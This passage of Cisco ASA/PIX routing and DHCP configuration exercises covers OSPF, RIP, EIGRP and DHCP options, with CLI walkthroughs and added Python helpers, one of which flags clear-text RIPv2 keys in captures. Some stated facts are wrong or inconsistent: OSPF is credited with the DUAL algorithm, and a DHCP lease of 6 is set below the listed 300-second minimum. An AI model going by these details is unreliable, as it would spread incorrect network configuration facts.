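    def apply(self, route: OspfRoute) -> OspfRoute:
        changes = {}
        if self.set_metric is not None:
            changes["metric"] = self.set_metric
        if self.set_metric_type is not None:
            changes["metric_type"] = self.set_metric_type
        if self.set_tag is not None:
            changes["tag"] = self.set_tag
        return replace(route, **changes)


def redistribute(routes: List[OspfRoute], route_map: List[RouteMapEntry]) -> List[OspfRoute]:
    """Routes that 'redistribute ospf 1 route-map ...' would inject into the other process."""
    out = []
    for route in routes:
        for entry in route_map:          # entries are evaluated in sequence order
            if entry.matches(route):
                if entry.action == "permit":
                    out.append(entry.apply(route))
                break                    # first match wins, for deny as well as permit
        # no entry matched: implicit deny, the route is not redistributed
    return out


# the page's route-map "testing": permit, match metric 1, set metric 5, type-1, tag 1
TESTING = [RouteMapEntry("permit", match_metric=1, set_metric=5, set_metric_type=1, set_tag=1)]

# constructed routes as they might be learned by OSPF process 1
OSPF1_ROUTES = [
    OspfRoute("10.1.0.0/16", metric=1),
    OspfRoute("10.2.0.0/16", metric=20),       # metric 20: filtered by the implicit deny
    OspfRoute("10.3.0.0/16", metric=1, tag=7),  # tag is overwritten by 'set tag 1'
]


def demo() -> List[OspfRoute]:
    return redistribute(OSPF1_ROUTES, TESTING)


if __name__ == "__main__":
    for r in demo():
        print(r)
```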

Cisco ASA/PIX Challenge 107


Title: Defining OSPF Interface Costs
Outline
With OSPF, each routing device maintains the same link-state routing database, for each
interface and all the reachable interfaces. All routing decisions are based on a cost derived from
bandwidth or from route preference, rather than on simple methods, such as hop count (as
used in RIP). In this challenge the OSPF costs are defined for an interface. For the interface,
the dead-interval is the time that the device must wait before it declares that a neighboring
device is down. Normally hello packets are passed, and if no hello packets are received within
the dead-interval, the neighbor is declared down. The length of time between transmitted hello
packets is defined by the hello-interval. If OSPF MD5 authentication is used, the key is
defined with a key ID and a key, using the ospf message-digest-key command. Also the
priority of the OSPF device is defined so that the OSPF designated router can be elected for
the network. This uses the priority option of the ospf command on an interface. For simple
passphrase authentication (OSPF password), the authentication-key option is used.
Objectives
The objectives of this challenge are to:

Define a route-map.
Define OSPF routing details.
Redistribute routes using the route-map.

Commands
(config)# router ospf 111
(config-router)# network 10.0.0.0 255.0.0.0 area 0
(config-router)# exit
(config)# int e1
(config-if)# ospf cost 20
(config-if)# ospf retransmit-interval 20
(config-if)# ospf transmit-delay 20
(config-if)# ospf priority 20
(config-if)# ospf hello-interval 20
(config-if)# ospf dead-interval 20
(config-if)# ospf authentication-key test
(config-if)# ospf message-digest-key 1 md5 test
(config-if)# ospf authentication message-digest

Example
(config)# router ospf 111
(config-router)# network 10.0.0.0 255.0.0.0 area 0
(config-router)# exit
(config)# int e1
(config-if)# ospf ?
interface mode commands/options:
authentication Enable authentication
authentication-key Authentication password (key)
cost Interface cost
database-filter Filter OSPF LSA during synchronization and flooding
dead-interval Interval after which a neighbor is declared dead
hello-interval Time between HELLO packets
message-digest-key Message digest authentication password (key)
mtu-ignore Ignores the MTU in DBD packets
network Network type
priority Router priority
retransmit-interval Time between retransmitting lost link state advertisements
transmit-delay Link state transmit delay
(config-if)# ospf cost ?
interface mode commands/options:
<1-65535> Cost
(config-if)# ospf cost 20
pixfirewall(config-if)# ospf retransmit-interval ?
interface mode commands/options:
<1-65535> Seconds
(config-if)# ospf retransmit-interval 20
(config-if)# ospf transmit-delay ?
interface mode commands/options:
<1-65535> Seconds
(config-if)# ospf transmit-delay 20
(config-if)# ospf priority ?
interface mode commands/options:
<0-255> Priority
(config-if)# ospf priority 20
(config-if)# os he ?
interface mode commands/options:
<1-65535> Seconds
(config-if)# ospf hello-interval 20
(config-if)# os de ?
interface mode commands/options:
<1-65535> Seconds
(config-if)# ospf dead-interval 20
(config-if)# ospf authentication-key ?
interface mode commands/options:
LINE < 9 char The OSPF password (key)
(config-if)# ospf authentication-key test
(config-if)# ospf message-digest-key ?
interface mode commands/options:
<1-255> Key ID
(config-if)# ospf message-digest-key 1 ?
interface mode commands/options:
md5 Use MD5 algorithm
(config-if)# ospf message-digest-key 1 md5 ?
interface mode commands/options:
LINE < 17 char The OSPF password (key)
(config-if)# ospf message-digest-key 1 md5 test
(config-if)# ospf authentication ?
interface mode commands/options:
message-digest Use message-digest authentication
null Use no authentication
<cr>
(config-if)# ospf authentication message-digest
(config-if)# exit
(config)# exit
# sh ospf
Routing Process "ospf 1" with ID 1.2.3.4 and Domain ID 0.0.0.1
Supports only single TOS(TOS0) routes
Does not support opaque LSA
SPF schedule delay 5 secs, Hold time between two SPFs 10 secs
Minimum LSA interval 5 secs. Minimum LSA arrival 1 secs
Number of external LSA 0. Checksum Sum 0x 0
Number of opaque AS LSA 0. Checksum Sum 0x 0
Number of DCbitless external and opaque AS LSA 0
Number of DoNotAge external and opaque AS LSA 0
Number of areas in this router is 1. 1 normal 0 stub 0 nssa
External flood list length 0
Area 1
Number of interfaces in this area is 1
Area has no authentication
SPF algorithm executed 1 times
Area ranges are
Number of LSA 1. Checksum Sum 0x ff12
Number of opaque link LSA 0. Checksum Sum 0x 0
Number of DCbitless LSA 0
Number of indication LSA 0
Number of DoNotAge LSA 0
Flood list length 0

Cisco ASA/PIX Challenge 108


Title: Defining OSPF Area Details
Outline
With OSPF, the main area details include defining:

Authentication. This provides protection against intruders with an OSPF
authentication password.
Stub areas. These are areas into which information gained on external networks is
not sent.
Default costs.

Other features included in this challenge are:

Route Summarization. It is possible to summarize routes between OSPF areas, such as with:
(config-router)# area 10 range 2.3.4.0 255.255.0.0

This command causes a single summary route to be sent for the network address of
2.3.4.0, which should cover all the networks within this area (10).
Default Route. In this case a boundary router generates a default route for the whole of the
OSPF domain. For example:
(config-router)# default-information originate always

forces the boundary device to generate a default route for the OSPF routing domain.
Route Calculation Timers. These relate to the delays used with OSPF for topology
changes, and for SPF (Shortest Path First) calculations. For example:
(config-router)# timers spf 10 20

defines a delay of 10 seconds between receiving a change and starting the SPF calculation, and a hold
time between consecutive SPF calculations of 20 seconds.
Logging Neighbor State. This is used to log the state of neighboring devices. For example:
(config-router)# log-adj-changes detail

logs the neighbor state in detail.
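As an added example (not part of the NetworkSims challenge), the following Python checks what an inter-area summary such as area 10 range 2.3.4.0 255.255.0.0 actually advertises, which area prefixes it fails to cover, and how much tighter it could be; the summary values are the challenge's own, the list of area 10 prefixes is constructed for illustration.

```python
"""Audit an OSPF inter-area summary (area <id> range <address> <mask>).

Added example, not NetworkSims code. The summary values are the challenge's own
(2.3.4.0 255.255.0.0 for area 10); the area prefix list is constructed here.
"""
from ipaddress import IPv4Network


def summary_network(address: str, mask: str) -> IPv4Network:
    """Normalise 'address mask' the way the range command does: host bits are
    ignored, so 2.3.4.0 255.255.0.0 is advertised as 2.3.0.0/16."""
    return IPv4Network(f"{address}/{mask}", strict=False)


def tightest_summary(prefixes) -> IPv4Network:
    """Smallest single prefix that still covers every listed network."""
    nets = [IPv4Network(p) for p in prefixes]
    candidate = nets[0]
    while not all(n.subnet_of(candidate) for n in nets):
        candidate = candidate.supernet()   # widen by one bit at a time
    return candidate


def audit_summary(address: str, mask: str, area_prefixes) -> dict:
    """Compare the configured summary with the prefixes really present in the area.

    'uncovered' prefixes are still flooded individually (the summary does not
    hide them); 'slack' is the number of addresses the summary claims but no
    area prefix uses, which is how an over-broad range attracts traffic for
    networks that do not exist in the area."""
    summary = summary_network(address, mask)
    nets = [IPv4Network(p) for p in area_prefixes]
    covered = [n for n in nets if n.subnet_of(summary)]
    uncovered = [str(n) for n in nets if not n.subnet_of(summary)]
    used = sum(n.num_addresses for n in covered)
    return {
        "advertised": str(summary),
        "covered": [str(n) for n in covered],
        "uncovered": uncovered,
        "slack": summary.num_addresses - used,
        "tightest": str(tightest_summary([str(n) for n in covered])) if covered else None,
    }


if __name__ == "__main__":
    # Constructed area 10 prefixes; the last one lies outside the summary.
    area10 = ["2.3.4.0/24", "2.3.5.0/24", "2.3.6.0/24", "2.4.0.0/24"]
    for key, value in audit_summary("2.3.4.0", "255.255.0.0", area10).items():
        print(f"{key}: {value}")
```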


Objectives
The objectives of this challenge are to:

Define OSPF.
Define OSPF routing area details.
Define OSPF stub details.
Define route timers.
Define default route.
Define logging of neighbors.

Outline
(config)# router ospf 111
(config-router)# area 1 authentication
(config-router)# area 1 authentication message-digest
(config-router)# area 10 stub
(config-router)# area 10 default-cost 15
(config-router)# summary-address 1.2.3.0 255.255.0.0
(config-router)# area 10 range 2.3.4.0 255.255.0.0
(config-router)# default-information originate always
(config-router)# log-adj-changes detail
(config-router)# timers spf 10 10

Example
(config)# router ospf 111
(config-router)# ?
Router configuration commands:
area OSPF area parameters
compatible OSPF compatibility list
default-information Control distribution of default information
distance Define an administrative distance
exit Exit from router configuration mode
help Interactive help for router subcommands
ignore Do not complain about specific event
log-adj-changes Log changes in adjacency state
neighbor Specify a neighbor router
network Add/remove interfaces to/from OSPF routing process
no Negate a command
redistribute Redistribute information from another routing process
router-id router-id for this OSPF process
summary-address Configure IP address summaries
timers Adjust routing timers

(config-router)# area ?
router mode commands/options:
<0-4294967295> OSPF area ID as a decimal value
A.B.C.D OSPF area ID in IP address format
(config-router)# area 1 ?
router mode commands/options:
authentication Enable authentication
default-cost Set the summary default-cost of a NSSA/stub area
filter-list Filter networks between OSPF areas
nssa Specify a NSSA area
range Summarize routes matching address/mask (border routers only)
stub Specify a stub area
virtual-link Define a virtual link and its parameters
<cr>
(config-router)# area 1 authentication
(config-router)# area 1 authentication ?
router mode commands/options:
message-digest Use message-digest authentication
<cr>
(config-router)# area 1 authentication message-digest
(config-router)# area 10 stub
(config-router)# area 10 default-cost ?
router mode commands/options:
<0-65535> Stub's advertised external route metric
(config-router)# area 10 default-cost 15

Route summarization allows various routes to be summarized into a single address, which
helps to reduce the size of the routing tables:
(config-router)# summary-address ?
router mode commands/options:
A.B.C.D IP summary address
(config-router)# summary-address 1.2.3.0 ?
router mode commands/options:
A.B.C.D Summary mask
(config-router)# summary-address 1.2.3.0 255.255.0.0

To summarize between OSPF areas:

(config-router)# area 10 range ?
router mode commands/options:
A.B.C.D IP address to match
(config-router)# area 10 range 2.3.4.0 ?
router mode commands/options:
A.B.C.D IP mask for address
(config-router)# area 10 range 2.3.4.0 255.255.0.0

To generate a default route:

(config-router)# default-information ?
router mode commands/options:
originate Distribute a default route
(config-router)# default-information originate ?
router mode commands/options:
always Always advertise default route
metric OSPF default metric
metric-type OSPF metric type for default routes
route-map Route-map reference
<cr>
(config-router)# default-information originate always
(config-router)# log-adj-changes ?
router mode commands/options:
detail Log all state changes
<cr>
(config-router)# log-adj-changes detail

For OSPF timers:

(config-router)# timers ?
router mode commands/options:
lsa-group-pacing OSPF LSA group pacing timer
spf OSPF SPF timers
(config-router)# timers spf ?
router mode commands/options:
<1-65535> Delay between receiving a change to SPF calculation
(config-router)# timers spf 10 ?
router mode commands/options:
<1-65535> Hold time between consecutive SPF calculations
(config-router)# timers spf 10 10

Cisco ASA/PIX Challenge 109


Title: Listening to RIP for Routing Information (Version 1)
Outline
The PIX/ASA devices can passively listen to RIP updates, using RIP Version 1 or RIP
Version 2. RIP Version 1 only supports classful addressing, with unencrypted broadcasts,
while RIP Version 2 supports classless addressing, and authentication. This challenge
defines RIP Version 1.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 interface details.
Define RIP Version 1 on each of the interfaces.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# rip Glasgow passive version 1

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# rip ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Glasgow Name of interface Ethernet0
(config)# rip Glasgow ?
configure mode commands/options:
default Configure the system to advertise default route
passive Enable the system to passively listen to RIP updates
(config)# rip Glasgow passive ?
configure mode commands/options:
version RIP version, default is RIPv1
<cr>
(config)# rip Glasgow passive version ?
configure mode commands/options:
1 RIP Version 1 (RIPv1)
2 RIP Version 2 (RIPv2)
(config)# rip Glasgow passive version 1 ?
configure mode commands/options:
<cr>
(config)# rip Glasgow passive version 1

Cisco ASA/PIX Challenge 110


Title: Listening to RIP for Routing Information (Version 2)
Outline
The PIX/ASA devices can passively listen to RIP updates, using RIP Version 1 or RIP
Version 2. RIP Version 1 only supports classful addressing, with unencrypted broadcasts,
while RIP Version 2 supports classless addressing, and authentication. This challenge
defines RIP Version 2.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 interface details.
Define RIP Version 2 on each of the interfaces.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# rip Glasgow passive version 2 authentication text popup

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# rip ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Glasgow Name of interface Ethernet0
(config)# rip Glasgow ?
configure mode commands/options:
default Configure the system to advertise default route
passive Enable the system to passively listen to RIP updates
(config)# rip Glasgow passive ?
configure mode commands/options:
version RIP version, default is RIPv1
<cr>
(config)# rip Glasgow passive version ?
configure mode commands/options:
1 RIP Version 1 (RIPv1)
2 RIP Version 2 (RIPv2)
(config)# rip Glasgow passive version 2 ?
configure mode commands/options:
authentication Authenticate using the specified mode
<cr>
(config)# rip Glasgow version 2 authentication ?
configure mode commands/options:
md5 Authenticate using md5 mode
text Authenticate using text mode
(config)# rip Glasgow passive version 2 authentication text ?
configure mode commands/options:
WORD < 17 char The shared key to be used for authentication
(config)# rip Glasgow passive version 2 authentication text popup
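The text mode chosen above places the shared key (popup) in the clear inside every RIPv2 packet, which is the reason the md5 mode exists. As an added example that is not part of the challenge, the following Python builds the RFC 2453 authentication entry for both modes and classifies a captured RIPv2 packet by its authentication type, the check a defender runs over a capture to find clear-text keys; the route entry, key id and sequence values are constructed.

```python
"""Build and classify RIPv2 authentication entries (RFC 2453 / RFC 2082 layout).

Added example, not NetworkSims code. The key 'popup' and the 16-byte limit
('WORD < 17 char') come from the challenge; route and key id values are constructed.
"""
import struct
from ipaddress import IPv4Address

RIP_RESPONSE, RIP_V2 = 2, 2
AFI_AUTH = 0xFFFF          # address family that marks an authentication entry
AUTH_SIMPLE, AUTH_MD5 = 2, 3


def rip_header(command: int = RIP_RESPONSE) -> bytes:
    return struct.pack("!BBH", command, RIP_V2, 0)


def simple_auth_entry(key: str) -> bytes:
    """Clear-text password entry: the key is stored as-is, null padded to 16 bytes,
    which is exactly the ASA's '< 17 char' limit on the shared key."""
    key_bytes = key.encode("ascii")
    if len(key_bytes) > 16:
        raise ValueError("RIPv2 simple password is at most 16 bytes")
    return struct.pack("!HH16s", AFI_AUTH, AUTH_SIMPLE, key_bytes)


def md5_auth_entry(packet_len: int, key_id: int, seq: int) -> bytes:
    """Keyed-MD5 header entry (RFC 2082). The key itself never appears on the
    wire, only its id; the 16-byte digest travels in a trailer entry that is
    omitted here because this example only classifies packets."""
    return struct.pack("!HHHBBI8s", AFI_AUTH, AUTH_MD5, packet_len, key_id, 16, seq, b"")


def route_entry(prefix: str, mask: str, next_hop: str, metric: int) -> bytes:
    return struct.pack("!HH4s4s4sI", 2, 0, IPv4Address(prefix).packed,
                       IPv4Address(mask).packed, IPv4Address(next_hop).packed, metric)


def classify_rip_auth(packet: bytes):
    """Return ('none' | 'text' | 'md5' | 'unknown', detail) for a RIPv2 packet.

    'text' is the finding to flag: the key is readable by anyone on the segment."""
    if len(packet) < 4:
        raise ValueError("truncated RIP header")
    _cmd, version, _zero = struct.unpack("!BBH", packet[:4])
    if version != 2 or len(packet) < 24:
        return ("none", None)
    afi, auth_type = struct.unpack("!HH", packet[4:8])
    if afi != AFI_AUTH:
        return ("none", None)
    if auth_type == AUTH_SIMPLE:
        return ("text", packet[8:24].rstrip(b"\0").decode("ascii", errors="replace"))
    if auth_type == AUTH_MD5:
        return ("md5", packet[10])   # key id byte of the MD5 header entry
    return ("unknown", auth_type)


if __name__ == "__main__":
    update = rip_header() + simple_auth_entry("popup") + \
        route_entry("192.168.1.0", "255.255.255.0", "0.0.0.0", 1)
    print(classify_rip_auth(update))   # ('text', 'popup')
    print(b"popup" in update)          # True: the key is visible on the wire
```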

Cisco ASA/PIX Challenge 111


Title: RIP on a PIX/ASA device.
Outline
In the past, a PIX/ASA device could only passively listen to RIP updates, using RIP
Version 1 or RIP Version 2, where RIP Version 1 supports classful addressing, with
unencrypted broadcasts, and RIP Version 2 supports classless addressing, and
authentication. Many PIX/ASA devices now fully support RIP.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 interface details.
Define RIP Version 2.
Define RIP broadcast networks.
Define a passive interface. In this mode the interface accepts RIP updates, but does
not send them out.
Generate a default route with the default-information command.
Define RIP authentication details on an interface.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# rip authentication mode text
(config-if)# rip send version 2
(config-if)# rip receive version 2
(config-if)# rip authentication key test key-id 1
(config-if)# exit
(config)# router rip
(config-router)# network 192.168.0.0
(config-router)# network 192.168.1.0
(config-router)# version 2
(config-router)# passive-interface Glasgow
(config-router)# exit

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# rip ?
interface mode commands/options:
authentication Authentication control
receive advertisement reception
send advertisement transmission
(config-if)# rip a ?
interface mode commands/options:
key Authentication key
mode Authentication mode
(config-if)# rip a m ?
interface mode commands/options:
md5 Keyed message digest
text Clear text authentication
(config-if)# rip a m t ?
interface mode commands/options:
<cr>
(config-if)# rip authentication mode text
(config-if)# rip r ?
interface mode commands/options:
version version control
(config-if)# rip s ?
interface mode commands/options:
version version control
(config-if)# rip s v ?
interface mode commands/options:
1 RIP version 1
2 RIP version 2
(config-if)# rip send version 2
(config-if)# rip receive version 2
(config-if)# rip a key ?
interface mode commands/options:
WORD < 17 char The shared key to be used for authentication key string
(config-if)# rip a k test ?
interface mode commands/options:
key_id Authentication key
(config-if)# rip a k test k ?
interface mode commands/options:
<0-255> The shared key id that matches the key
(config-if)# rip a k test k 1 ?
interface mode commands/options:
<cr>
(config-if)# rip authentication key test key-id 1
(config-if)# exit
(config)# router ?
configure mode commands/options:
ospf Open Shortest Path First (OSPF)
rip Routing Information Protocol (RIP)
(config)# router rip
(config-router)# ?
Router configuration commands:
auto-summary Enable automatic network number summarization
default-information Control distribution of default information
distribute-list Filter networks in routing updates
exit Exit from router configuration mode
help Interactive help for router subcommands
network Add/remove interfaces to/from routing process
no Negate a command
passive-interface Suppress routing updates on an interface
redistribute Redistribute information from another routing process
version Set routing protocol version


(config-router)# network ?
router mode commands/options:
Hostname or A.B.C.D Network address
(config-router)# network 192.168.0.0
(config-router)# network 192.168.1.0
(config-router)# version ?
router mode commands/options:
<1-2> version
exec mode commands/options:
/md5 Compute an MD5 signature for a file
disk0: File to be verified
flash: File to be verified
(config-router)# version 2
(config-router)# default-information ?
router mode commands/options:
originate Distribute a default route
(config-router)# default-information o ?
router mode commands/options:
route-map Route-map reference
<cr>
(config-router)# default-information originate
(config-router)# passive-interface ?
router mode commands/options:
Current available interface(s):
default Suppress routing updates on all interfaces
Glasgow Name of interface ETHERNET0
Inside Name of interface ETHERNET1
Inf2 Name of interface ETHERNET2
<cr>
(config-router)# passive-interface Glasgow
(config-router)# exit

Cisco ASA/PIX Challenge 112


Title: Enabling and configuring EIGRP
Outline
ASA 8.x brought many new features to the range, including:

EIGRP routing.
High-availability functionality.
SSL VPN enhancements.
SSL VPN support for Windows Vista and Mac OS X clients is now available.
AnyConnect VPN client.
Local certificate authority.
VPN load balancing.
Additional browser-based SSL VPN features.
Transparent NAT.

The PIX/ASA devices can thus enable EIGRP routing, which is an enhancement of IGRP.
The main advantage of this protocol is that it only sends out routing information when there
is a change in the topology. EIGRP is one of the new features of the PIX/ASA device.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 interface details.
Define EIGRP routing and the networks into which to broadcast (that is, the
networks which participate in the EIGRP routing process).
Define EIGRP authentication on E0.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# authentication mode eigrp 111 md5
(config-if)# authentication key eigrp 111 testing key-id 1
(config-if)# exit
(config)# router eigrp 111
(config-router)# network 192.168.0.0
(config-router)# network 192.168.1.0

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# authentication mode eigrp 111 md5
(config-if)# authentication key eigrp 111 testing key-id 1
(config-if)# exit
(config)# router eigrp 111
(config-router)# network 192.168.0.0
(config-router)# network 192.168.1.0

Cisco PIX Test (Challenge 113)


Outline
This challenge involves taking a PIX test on routing protocols. The main facts are:

PIX/ASA have used RIP and OSPF, and have now added EIGRP.
RIP uses hop count to determine the best route.
OSPF uses a link-state algorithm to determine the best route.
OSPF uses the DUAL algorithm to determine the best route.

Cisco ASA/PIX Challenge 114


Title: DHCP Server on a PIX/ASA.
Outline
This challenge involves the configuration of the DHCP server.
Objectives
The objectives of this challenge are to:

Enable the DHCP server.
Define DHCP parameters.
Show DHCP parameters.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# dhcpd enable glasgow
(config)# dhcpd dns 197.174.60.1
(config)# dhcpd address 197.174.60.2-197.174.60.22 glasgow
(config)# dhcpd wins 195.94.110.3
(config)# dhcpd lease 6
(config)# dhcpd domain athome.com
(config)# show dhcpd

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0


(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# dhcpd ?
configure mode commands/options:
address Configure the IP pool address range after this keyword
auto_config Enable auto configuration from client
dns Configure the IP addresses of the DNS servers after this keyword
domain Configure DNS domain name after this keyword
enable Enable the DHCP server
lease Configure the DHCPD lease length after this keyword
option Configure options to pass to DHCP clients after this keyword
ping_timeout Configure ping timeout value after this keyword
wins Configure the IP addresses of the NETBIOS servers after this keyword
pixfirewall(config)# dhcpd enable ?
configure mode commands/options:
Available interfaces on which to enable the DHCP server:
Glasgow Name of interface ETHERNET0
Inside Name of interface ETHERNET1
Inf2 Name of interface ETHERNET2
<cr>
(config)# dhcpd enable glasgow
(config)# dhcpd dn ?
configure mode commands/options:
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd dns 197.174.60.1
(config)# dhcpd add ?
configure mode commands/options:
WORD IP address[es], <ip1>[-<ip2>]
(config)# dhcpd address 197.174.60.2-197.174.60.22 glasgow
(config)# dhcpd wins ?
configure mode commands/options:
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd wins 195.94.110.3
(config)# dhcpd lease ?
configure mode commands/options:
<300-1048575> The length of lease, in seconds, granted to DHCP client
from the DHCP server, default is 3600
(config)# dhcpd lease 6
(config)# dhcpd domain ?
configure mode commands/options:
WORD DNS domain name
(config)# dhcpd domain athome.com
(config)# show dhcpd

Cisco ASA/PIX Challenge 115


Title: Configuring DHCP server options for Cisco IP phones


Outline
Cisco IP phones download their configuration from TFTP servers, which are not
preconfigured on them. Thus they send a DHCP request with an option field set to 150 (for a
list of TFTP servers) or 66 (for a single TFTP server) to discover the address for their
configuration. Also they may request the default gateway with an option of 3.
Objectives
The objectives of this challenge are to:

Enable the DHCP server.
Define DHCP parameters.
Define default TFTP server for DHCP option 150.
Define default TFTP server for DHCP option 66.
Define default gateway server for DHCP option 3.
Show DHCP parameters.

Commands
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# dhcpd enable glasgow
(config)# dhcpd dns 197.174.60.1
(config)# dhcpd address 197.174.60.2-197.174.60.22 glasgow
(config)# dhcpd wins 195.94.110.3
(config)# dhcpd lease 6
(config)# dhcpd domain athome.com
(config)# dhcpd option 150 ip 192.168.0.1
(config)# dhcpd option 66 ascii 192.168.0.1
(config)# dhcpd option 3 ip 192.168.0.2
(config)# show dhcpd

Example
# config t
(config)# int e0
(config-if)# nameif glasgow
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# no shutdown
(config-if)# security-level 0
(config-if)# exit
(config)# dhcpd ?
configure mode commands/options:
address Configure the IP pool address range after this keyword
auto_config Enable auto configuration from client
dns Configure the IP addresses of the DNS servers after this keyword
domain Configure DNS domain name after this keyword
enable Enable the DHCP server
lease Configure the DHCPD lease length after this keyword
option Configure options to pass to DHCP clients after this keyword
ping_timeout Configure ping timeout value after this keyword
wins Configure the IP addresses of the NETBIOS servers after this keyword
pixfirewall(config)# dhcpd enable ?
configure mode commands/options:
Available interfaces on which to enable the DHCP server:
Glasgow Name of interface ETHERNET0
Inside Name of interface ETHERNET1
Inf2 Name of interface ETHERNET2
<cr>
(config)# dhcpd enable glasgow
(config)# dhcpd dn ?
configure mode commands/options:
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd dns 197.174.60.1
(config)# dhcpd add ?
configure mode commands/options:
WORD IP address[es], <ip1>[-<ip2>]
(config)# dhcpd address 197.174.60.2-197.174.60.22 glasgow
(config)# dhcpd wins ?
configure mode commands/options:
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd wins 195.94.110.3
(config)# dhcpd lease ?
configure mode commands/options:
<300-1048575> The length of lease, in seconds, granted to DHCP client
from the DHCP server, default is 3600
(config)# dhcpd lease 6
(config)# dhcpd domain ?
configure mode commands/options:
WORD DNS domain name
(config)# dhcpd domain athome.com
(config)# dhcpd option ?
configure mode commands/options:
<0-255> DHCP option code
ciscoasa(config)# dhcpd option 150 ?
configure mode commands/options:
ascii Configure the option information in ascii after this keyword
hex Configure the option information as a hexidecimal value after this keyword
ip Configure the option information as IP address(es) after this keyword
<cr>
ciscoasa(config)# dhcpd option 150 ip ?
configure mode commands/options:
Hostname or A.B.C.D IP address of server 1
(config)# dhcpd option 150 ip 192.168.0.1
(config)# dhcpd option 66 ascii ?
configure mode commands/options:
WORD ASCII string without whitespace
(config)# dhcpd option 66 ascii 192.168.0.1
(config)# dhcpd option 3 ip 192.168.0.2
(config)# show dhcpd
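As an added example (not the challenge's own code), the following Python encodes the three options from the Commands section in the ip, ascii and hex forms that dhcpd option offers, then decodes them the way a phone would. It shows why the form matters: option 66 in ascii form carries the address as an 11-byte string rather than 4 raw bytes. The option codes and addresses are the challenge's; the second TFTP address in the test is constructed.

```python
"""Encode/decode DHCP option TLVs for the ASA 'dhcpd option <code> {ip|ascii|hex}' forms.

Added example, not NetworkSims code. Option codes and values are the challenge's
(150 ip, 66 ascii, 3 ip); any extra addresses used for demonstration are constructed.
"""
import struct
from ipaddress import IPv4Address

OPT_PAD, OPT_END = 0, 255


def encode_option(code: int, kind: str, value: str) -> bytes:
    """Build one option as code, length, data (the RFC 2132 TLV layout)."""
    if kind == "ip":
        data = b"".join(IPv4Address(a).packed for a in value.split())
    elif kind == "ascii":
        if any(c.isspace() for c in value):
            raise ValueError("ascii option value may not contain whitespace")
        data = value.encode("ascii")
    elif kind == "hex":
        data = bytes.fromhex(value)
    else:
        raise ValueError(f"unknown option form {kind!r}")
    if not 0 < code < 255 or len(data) > 255:
        raise ValueError("option code or length out of range")
    return struct.pack("!BB", code, len(data)) + data


def decode_options(blob: bytes) -> dict:
    """Parse a run of TLVs into {code: data}, honouring pad and end markers and
    refusing a length that runs past the buffer (a truncated or malformed option)."""
    options, i = {}, 0
    while i < len(blob):
        code = blob[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(blob):
            raise ValueError("option code without length")
        length = blob[i + 1]
        data = blob[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError(f"option {code} length {length} overruns buffer")
        options[code] = data
        i += 2 + length
    return options


def tftp_servers(options: dict) -> list:
    """What a Cisco IP phone learns: option 150 is a list of raw IPv4 addresses,
    option 66 a single server given as text."""
    servers = []
    data = options.get(150, b"")
    if len(data) % 4:
        raise ValueError("option 150 must be a multiple of 4 bytes")
    servers += [str(IPv4Address(data[k:k + 4])) for k in range(0, len(data), 4)]
    if 66 in options:
        servers.append(options[66].decode("ascii"))
    return servers


def default_gateway(options: dict):
    data = options.get(3)
    return str(IPv4Address(data[:4])) if data else None


if __name__ == "__main__":
    blob = (encode_option(150, "ip", "192.168.0.1")
            + encode_option(66, "ascii", "192.168.0.1")
            + encode_option(3, "ip", "192.168.0.2")
            + bytes([OPT_END]))
    opts = decode_options(blob)
    print(len(opts[150]), len(opts[66]))   # 4 11
    print(tftp_servers(opts), default_gateway(opts))
```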

Cisco PIX/ASA Challenge 116


Title: Configuring DHCP Relay Services
Outline
This challenge involves defining DHCP relay, where DHCP requests can be forwarded to a
certain interface. DHCP relay is used to send DHCP requests from clients to a destination
DHCP device. This allows DHCP servers to be placed outside local networks, with the PIX/ASA
device then used to point to the required server. For DHCP relay, there must be no DHCP
server on the same interface. Also, for security purposes, clients cannot send their DHCP
requests through the PIX/ASA themselves; all requests must be relayed by it.
Objectives
The objectives of this challenge are to:

Define interface details.
